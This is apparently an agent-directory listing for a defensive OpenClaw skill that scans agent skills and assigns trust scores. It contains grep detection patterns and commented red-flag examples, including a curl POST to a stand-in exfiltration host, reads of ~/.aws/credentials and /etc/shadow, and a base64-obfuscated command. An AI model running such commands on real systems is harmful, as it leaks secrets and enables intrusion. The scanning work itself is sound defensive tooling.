Rank
70
AI Agents & MCPs & AI Workflow Automation โข (~400 MCP servers for AI agents) โข AI Automation / AI Agent with MCPs โข AI Workflows & AI Agents โข MCPs for AI Agents
Traction
No public download signal
Freshness
Updated 2d ago
Crawler Summary
Skill Security Scanner --- name: skill-security-scanner description: Scan OpenClaw skills for security issues, suspicious permissions, and trust scoring. Use when: (1) Installing a new skill, (2) Auditing existing skills, (3) User asks if a skill is safe, (4) Before running untrusted skills. metadata: {"openclaw":{"emoji":"๐"}} --- Skill Security Scanner Scan OpenClaw skills for security issues, suspicious patterns, and give a trust score Capability contract not published. No trust telemetry is available yet. Last updated 2/25/2026.
Freshness
Last checked 2/25/2026
Best For
skill-security-scanner is best for openclaw, a, all workflows where OpenClaw compatibility matters.
Not Ideal For
Contract metadata is missing or unavailable for deterministic execution.
Evidence Sources Checked
editorial-content, GITHUB OPENCLEW, runtime-metrics, public facts pack
Skill Security Scanner --- name: skill-security-scanner description: Scan OpenClaw skills for security issues, suspicious permissions, and trust scoring. Use when: (1) Installing a new skill, (2) Auditing existing skills, (3) User asks if a skill is safe, (4) Before running untrusted skills. metadata: {"openclaw":{"emoji":"๐"}} --- Skill Security Scanner Scan OpenClaw skills for security issues, suspicious patterns, and give a trust score
Public facts
4
Change events
1
Artifacts
0
Freshness
Feb 25, 2026
Capability contract not published. No trust telemetry is available yet. Last updated 2/25/2026.
Trust score
Unknown
Compatibility
OpenClaw
Freshness
Feb 25, 2026
Vendor
Steffano198
Artifacts
0
Benchmarks
0
Last release
Unpublished
Key links, install path, and a quick operational read before the deeper crawl record.
Summary
Capability contract not published. No trust telemetry is available yet. Last updated 2/25/2026.
Setup snapshot
git clone https://github.com/Steffano198/skill-security-scanner.gitSetup complexity is LOW. This package is likely designed for quick installation with minimal external side-effects.
Final validation: Expose the agent to a mock request payload inside a sandbox and trace the network egress before allowing access to real customer data.
Everything public we have scraped or crawled about this agent, grouped by evidence type with provenance.
Vendor
Steffano198
Protocol compatibility
OpenClaw
Handshake status
UNKNOWN
Crawlable docs
6 indexed pages on the official domain
Merged public release, docs, artifact, benchmark, pricing, and trust refresh events.
Extracted files, examples, snippets, parameters, dependencies, permissions, and artifact metadata.
Extracted files
0
Examples
6
Snippets
0
Languages
typescript
Parameters
bash
# Network calls to unknown domains
grep -E "(curl|wget|http|https).*\.com" SKILL.md
grep -E "fetch\(|axios\(" SKILL.md
# File system access beyond declared scope
grep -E "rm -rf|dd |mkfs" SKILL.md
# Credential access
grep -E "password|secret|token|key" SKILL.md
# Execution of downloaded code
grep -E "eval\(|exec\(|system\(" SKILL.md
# Base64 encoded commands
grep -E "base64|-enc|-encode" SKILL.mdtext
๐ Skill: <skill-name> โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ ๐ Trust Score: <score>/100 (<risk-level>) ๐ Permissions Requested: โข bins: curl, jq โข env: OPENWEATHER_API_KEY โ ๏ธ Issues Found: 1. [MEDIUM] Requests network access but no clear purpose 2. [LOW] No recent updates (6+ months) โ Positive Signs: โข Official OpenClaw skill โข Clear documentation
markdown
## Security Analysis: <skill-name> ### Score: <score>/100 (<risk-level>) ### Permissions Analysis | Type | Requested | Risk | |------|-----------|------| | bins | curl, jq | Low | | env | API_KEY | Medium | ### Code Pattern Analysis - โ No suspicious execution patterns - โ No credential access attempts - โ ๏ธ 2 network calls to external domains ### Recommendation <RECOMMENDATION>
bash
# Example: sending data to unknown servers
# curl -X POST https://SUSPICIOUS-DOMAIN/exfil
# fetch("https://data-collector.DOMAIN")bash
# Example: reading credentials # cat ~/.aws/credentials # grep "password" /etc/shadow
bash
# Example: auto-start, cron, systemd # sudo crontab -l # systemctl enable
Full documentation captured from public sources, including the complete README when available.
Docs source
GITHUB OPENCLEW
Editorial quality
ready
Skill Security Scanner --- name: skill-security-scanner description: Scan OpenClaw skills for security issues, suspicious permissions, and trust scoring. Use when: (1) Installing a new skill, (2) Auditing existing skills, (3) User asks if a skill is safe, (4) Before running untrusted skills. metadata: {"openclaw":{"emoji":"๐"}} --- Skill Security Scanner Scan OpenClaw skills for security issues, suspicious patterns, and give a trust score
Scan OpenClaw skills for security issues, suspicious patterns, and give a trust score. Helps users make informed decisions about which skills to trust.
| Command | Purpose |
|---------|---------|
| scan-skill <path> | Scan a single skill |
| scan-all | Scan all skills in workspace |
| trust-score <path> | Get quick trust score (0-100) |
| list-permissions <path> | List all requested permissions |
Look for:
bins - CLI tools skill needsenv - Environment variables (API keys, tokens)requires.config - Required config settingsrequires.bins - Binary dependenciesRed flags:
Suspicious patterns to detect:
# Network calls to unknown domains
grep -E "(curl|wget|http|https).*\.com" SKILL.md
grep -E "fetch\(|axios\(" SKILL.md
# File system access beyond declared scope
grep -E "rm -rf|dd |mkfs" SKILL.md
# Credential access
grep -E "password|secret|token|key" SKILL.md
# Execution of downloaded code
grep -E "eval\(|exec\(|system\(" SKILL.md
# Base64 encoded commands
grep -E "base64|-enc|-encode" SKILL.md
Score from 0-100 based on:
| Factor | Weight | Criteria | |--------|--------|----------| | Author reputation | 20% | Known author? Official OpenClaw skill? | | Permission scope | 30% | Minimal bins/envs? | | Code patterns | 25% | No suspicious commands | | Update frequency | 15% | Recently updated? | | Download count | 10% | Popular = more scrutiny |
| Score | Risk | Action | |-------|------|--------| | 80-100 | ๐ข Low | Safe to use | | 60-79 | ๐ก Medium | Review before use | | 40-59 | ๐ High | Use with caution | | 0-39 | ๐ด Critical | Don't use |
๐ Skill: <skill-name>
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ Trust Score: <score>/100 (<risk-level>)
๐ Permissions Requested:
โข bins: curl, jq
โข env: OPENWEATHER_API_KEY
โ ๏ธ Issues Found:
1. [MEDIUM] Requests network access but no clear purpose
2. [LOW] No recent updates (6+ months)
โ
Positive Signs:
โข Official OpenClaw skill
โข Clear documentation
Generate a full report:
## Security Analysis: <skill-name>
### Score: <score>/100 (<risk-level>)
### Permissions Analysis
| Type | Requested | Risk |
|------|-----------|------|
| bins | curl, jq | Low |
| env | API_KEY | Medium |
### Code Pattern Analysis
- โ
No suspicious execution patterns
- โ
No credential access attempts
- โ ๏ธ 2 network calls to external domains
### Recommendation
<RECOMMENDATION>
Network exfiltration
# Example: sending data to unknown servers
# curl -X POST https://SUSPICIOUS-DOMAIN/exfil
# fetch("https://data-collector.DOMAIN")
Credential harvesting
# Example: reading credentials
# cat ~/.aws/credentials
# grep "password" /etc/shadow
Persistence mechanisms
# Example: auto-start, cron, systemd
# sudo crontab -l
# systemctl enable
Obfuscated code
# Example: base64 encoded commands
echo "c3VkbyByb20gL3J0ZiAv" | base64 -d
# 1. Get skill path (ClawHub or local)
# 2. Run full scan
scan-skill /path/to/skill
# 3. Check trust score
trust-score /path/to/skill
# 4. Review issues
# 5. Decide: install / skip / investigate more
# Weekly: scan all installed skills
scan-all
# Monthly: generate full report
# Save to .learnings/ for documentation
# For quick decision
trust-score <path>
# If score < 60, do full scan
# If score < 40, don't use
.learnings/User wants to install "cool-new-skill" from ClawHub:
> scan-skill ./skills/cool-new-skill
๐ Scanning: cool-new-skill
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ Trust Score: 72/100 (๐ก Medium)
๐ Permissions:
โข bins: none
โข env: none
โ ๏ธ Issues:
โข No recent updates (8 months)
โข Unknown author
โ
Positives:
โข Clear documentation
โข Minimal permissions
๐ก Recommendation: Safe to try, monitor usage
> scan-skill ./skills/suspicious-skill
๐ Scanning: suspicious-skill
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ Trust Score: 23/100 (๐ด CRITICAL)
๐ Permissions:
โข bins: curl, base64
โข env: API_KEY, SECRET_TOKEN
๐จ CRITICAL ISSUES FOUND:
1. Network exfiltration pattern detected
2. Credential access attempt
3. Obfuscated commands (base64)
๐ Recommendation: DO NOT USE - Potential malware
> scan-all
๐ Scanning all skills in ~/.openclaw/workspace/skills/
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ
github: 95/100 (safe)
โ ๏ธ todoist: 68/100 (review needed)
โ
self-improving-agent: 92/100 (safe)
๐ด unknown-skill: 34/100 (remove recommended)
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Summary: 2 safe, 1 review, 1 remove
Machine endpoints, protocol fit, contract coverage, invocation examples, and guardrails for agent-to-agent use.
Contract coverage
Status
missing
Auth
None
Streaming
No
Data region
Unspecified
Protocol support
Requires: none
Forbidden: none
Guardrails
Operational confidence: low
curl -s "https://xpersona.co/api/v1/agents/steffano198-skill-security-scanner/snapshot"
curl -s "https://xpersona.co/api/v1/agents/steffano198-skill-security-scanner/contract"
curl -s "https://xpersona.co/api/v1/agents/steffano198-skill-security-scanner/trust"
Trust and runtime signals, benchmark suites, failure patterns, and practical risk constraints.
Trust signals
Handshake
UNKNOWN
Confidence
unknown
Attempts 30d
unknown
Fallback rate
unknown
Runtime metrics
Observed P50
unknown
Observed P95
unknown
Rate limit
unknown
Estimated cost
unknown
Do not use if
Every public screenshot, visual asset, demo link, and owner-provided destination tied to this agent.
Neighboring agents from the same protocol and source ecosystem for comparison and shortlist building.
Rank
70
AI Agents & MCPs & AI Workflow Automation โข (~400 MCP servers for AI agents) โข AI Automation / AI Agent with MCPs โข AI Workflows & AI Agents โข MCPs for AI Agents
Traction
No public download signal
Freshness
Updated 2d ago
Rank
70
AI productivity studio with smart chat, autonomous agents, and 300+ assistants. Unified access to frontier LLMs
Traction
No public download signal
Freshness
Updated 6d ago
Rank
70
Free, local, open-source 24/7 Cowork app and OpenClaw for Gemini CLI, Claude Code, Codex, OpenCode, Qwen Code, Goose CLI, Auggie, and more | ๐ Star if you like it!
Traction
No public download signal
Freshness
Updated 6d ago
Rank
70
The Frontend for Agents & Generative UI. React + Angular
Traction
No public download signal
Freshness
Updated 23d ago
Contract JSON
{
"contractStatus": "missing",
"authModes": [],
"requires": [],
"forbidden": [],
"supportsMcp": false,
"supportsA2a": false,
"supportsStreaming": false,
"inputSchemaRef": null,
"outputSchemaRef": null,
"dataRegion": null,
"contractUpdatedAt": null,
"sourceUpdatedAt": null,
"freshnessSeconds": null
}Invocation Guide
{
"preferredApi": {
"snapshotUrl": "https://xpersona.co/api/v1/agents/steffano198-skill-security-scanner/snapshot",
"contractUrl": "https://xpersona.co/api/v1/agents/steffano198-skill-security-scanner/contract",
"trustUrl": "https://xpersona.co/api/v1/agents/steffano198-skill-security-scanner/trust"
},
"curlExamples": [
"curl -s \"https://xpersona.co/api/v1/agents/steffano198-skill-security-scanner/snapshot\"",
"curl -s \"https://xpersona.co/api/v1/agents/steffano198-skill-security-scanner/contract\"",
"curl -s \"https://xpersona.co/api/v1/agents/steffano198-skill-security-scanner/trust\""
],
"jsonRequestTemplate": {
"query": "summarize this repo",
"constraints": {
"maxLatencyMs": 2000,
"protocolPreference": [
"OPENCLEW"
]
}
},
"jsonResponseTemplate": {
"ok": true,
"result": {
"summary": "...",
"confidence": 0.9
},
"meta": {
"source": "GITHUB_OPENCLEW",
"generatedAt": "2026-04-17T04:17:15.078Z"
}
},
"retryPolicy": {
"maxAttempts": 3,
"backoffMs": [
500,
1500,
3500
],
"retryableConditions": [
"HTTP_429",
"HTTP_503",
"NETWORK_TIMEOUT"
]
}
}Trust JSON
{
"status": "unavailable",
"handshakeStatus": "UNKNOWN",
"verificationFreshnessHours": null,
"reputationScore": null,
"p95LatencyMs": null,
"successRate30d": null,
"fallbackRate": null,
"attempts30d": null,
"trustUpdatedAt": null,
"trustConfidence": "unknown",
"sourceUpdatedAt": null,
"freshnessSeconds": null
}Capability Matrix
{
"rows": [
{
"key": "OPENCLEW",
"type": "protocol",
"support": "unknown",
"confidenceSource": "profile",
"notes": "Listed on profile"
},
{
"key": "openclaw",
"type": "capability",
"support": "supported",
"confidenceSource": "profile",
"notes": "Declared in agent profile metadata"
},
{
"key": "a",
"type": "capability",
"support": "supported",
"confidenceSource": "profile",
"notes": "Declared in agent profile metadata"
},
{
"key": "all",
"type": "capability",
"support": "supported",
"confidenceSource": "profile",
"notes": "Declared in agent profile metadata"
},
{
"key": "result",
"type": "capability",
"support": "supported",
"confidenceSource": "profile",
"notes": "Declared in agent profile metadata"
},
{
"key": "scan",
"type": "capability",
"support": "supported",
"confidenceSource": "profile",
"notes": "Declared in agent profile metadata"
},
{
"key": "results",
"type": "capability",
"support": "supported",
"confidenceSource": "profile",
"notes": "Declared in agent profile metadata"
}
],
"flattenedTokens": "protocol:OPENCLEW|unknown|profile capability:openclaw|supported|profile capability:a|supported|profile capability:all|supported|profile capability:result|supported|profile capability:scan|supported|profile capability:results|supported|profile"
}Facts JSON
[
{
"factKey": "docs_crawl",
"category": "integration",
"label": "Crawlable docs",
"value": "6 indexed pages on the official domain",
"href": "https://github.com/login?return_to=https%3A%2F%2Fgithub.com%2Fopenclaw%2Fskills%2Ftree%2Fmain%2Fskills%2Fasleep123%2Fcaldav-calendar",
"sourceUrl": "https://github.com/login?return_to=https%3A%2F%2Fgithub.com%2Fopenclaw%2Fskills%2Ftree%2Fmain%2Fskills%2Fasleep123%2Fcaldav-calendar",
"sourceType": "search_document",
"confidence": "medium",
"observedAt": "2026-04-15T05:03:46.393Z",
"isPublic": true
},
{
"factKey": "vendor",
"category": "vendor",
"label": "Vendor",
"value": "Steffano198",
"href": "https://github.com/Steffano198/skill-security-scanner",
"sourceUrl": "https://github.com/Steffano198/skill-security-scanner",
"sourceType": "profile",
"confidence": "medium",
"observedAt": "2026-02-25T01:47:49.861Z",
"isPublic": true
},
{
"factKey": "protocols",
"category": "compatibility",
"label": "Protocol compatibility",
"value": "OpenClaw",
"href": "https://xpersona.co/api/v1/agents/steffano198-skill-security-scanner/contract",
"sourceUrl": "https://xpersona.co/api/v1/agents/steffano198-skill-security-scanner/contract",
"sourceType": "contract",
"confidence": "medium",
"observedAt": "2026-02-25T01:47:49.861Z",
"isPublic": true
},
{
"factKey": "handshake_status",
"category": "security",
"label": "Handshake status",
"value": "UNKNOWN",
"href": "https://xpersona.co/api/v1/agents/steffano198-skill-security-scanner/trust",
"sourceUrl": "https://xpersona.co/api/v1/agents/steffano198-skill-security-scanner/trust",
"sourceType": "trust",
"confidence": "medium",
"observedAt": null,
"isPublic": true
}
]Change Events JSON
[
{
"eventType": "docs_update",
"title": "Docs refreshed: Sign in to GitHub ยท GitHub",
"description": "Fresh crawlable documentation was indexed for the official domain.",
"href": "https://github.com/login?return_to=https%3A%2F%2Fgithub.com%2Fopenclaw%2Fskills%2Ftree%2Fmain%2Fskills%2Fasleep123%2Fcaldav-calendar",
"sourceUrl": "https://github.com/login?return_to=https%3A%2F%2Fgithub.com%2Fopenclaw%2Fskills%2Ftree%2Fmain%2Fskills%2Fasleep123%2Fcaldav-calendar",
"sourceType": "search_document",
"confidence": "medium",
"observedAt": "2026-04-15T05:03:46.393Z",
"isPublic": true
}
]Sponsored
Ads related to skill-security-scanner and adjacent AI workflows.